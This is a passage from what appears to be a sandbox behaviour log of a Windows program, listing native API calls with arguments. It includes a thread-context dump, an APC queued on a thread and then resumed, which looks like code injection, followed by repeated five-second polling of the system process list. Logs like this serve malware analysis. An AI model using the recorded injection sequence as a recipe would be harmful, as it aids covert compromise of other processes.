[6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x2b, [11]=0x0, [12]=0x46, [13]=0x2, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x20, [65]=0xa6, [66]=0xe7, [67]=0x4, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x10, [73]=0xe7, [74]=0x5a, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x616920, SegEs=0x0, SegDs=0xcfa98, Edi=0x0, Esi=0xcfb10, Ebx=0x0, Edx=0x0, Ecx=0x0, Eax=0xffffffff, Ebp=0x0, Eip=0x0, SegCs=0x0, EFlags=0x0, Esp=0x0, SegSs=0x100e8, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x70, [5]=0xf8, [6]=0xc, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0xe8, [21]=0xa7, [22]=0x38, [23]=0x5d, [24]=0xfc, [25]=0x7f, [26]=0x0, [27]=0x0, [28]=0x40, [29]=0x41, [30]=0x61, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0xa0, [37]=0xda, [38]=0xce, [39]=0x5c, [40]=0xfc, [41]=0x7f, [42]=0x0, [43]=0x0, [44]=0xe5, [45]=0xe8, [46]=0xa, [47]=0xb, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x7f, [53]=0x2, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0xa0, [77]=0x1f, [78]=0x0, [79]=0x0, [80]=0xff, [81]=0xff, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0129.245] NtQueueApcThread (ThreadHandle=0x1ac, ApcRoutine=0xb0ae8f2, NormalContext=0x0, SystemArgument1=0x0, SystemArgument2=0x0) returned 0x0 [0129.251] NtResumeThread (in: ThreadHandle=0x1ac, SuspendCount=0x0 | out: SuspendCount=0x0) returned 0x0 [0129.251] NtClose (Handle=0x1a8) returned 0x0 [0129.252] NtClose (Handle=0x1ac) returned 0x0 [0129.257] PostThreadMessageW (idThread=0x664, Msg=0x111, wParam=0x0, lParam=0x0) returned 0 [0129.288] PostThreadMessageW (idThread=0x664, Msg=0x8003, wParam=0xde6da, lParam=0x0) returned 0 [0129.304] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0129.305] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0134.338] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0134.338] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0134.386] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0134.387] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0134.387] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0134.393] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0134.394] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0139.459] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0139.460] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0139.463] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0139.463] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0139.464] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0139.511] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0139.512] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0144.695] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0144.715] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0144.721] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0144.722] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0144.722] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0144.753] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0144.753] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0144.761] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0144.762] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0144.763] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0144.763] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0144.764] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0144.768] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0144.769] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0144.789] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0144.790] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0144.791] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0144.791] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0144.792] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0144.796] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0144.796] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0144.814] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0144.814] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0144.816] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0144.816] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0144.816] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0144.821] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0144.822] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0144.906] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0144.906] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0144.907] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0144.908] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0144.908] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0145.013] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0145.014] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0145.079] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0145.079] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0145.081] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0145.081] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0145.081] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0145.085] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0145.086] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0145.091] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0145.091] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0145.092] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0145.092] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0145.092] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0145.096] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0145.096] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0145.101] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0145.101] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0145.102] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0145.102] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0145.103] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0145.106] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0145.107] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0145.111] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0145.111] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0145.112] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0145.112] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0145.112] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0145.116] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0145.117] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0145.123] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0145.124] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0145.125] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0145.125] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0145.125] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0145.130] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0145.144] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0145.159] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0145.160] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0145.161] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0145.161] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0145.162] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0145.165] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0145.166] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0145.169] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0145.169] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0145.170] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0145.171] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: 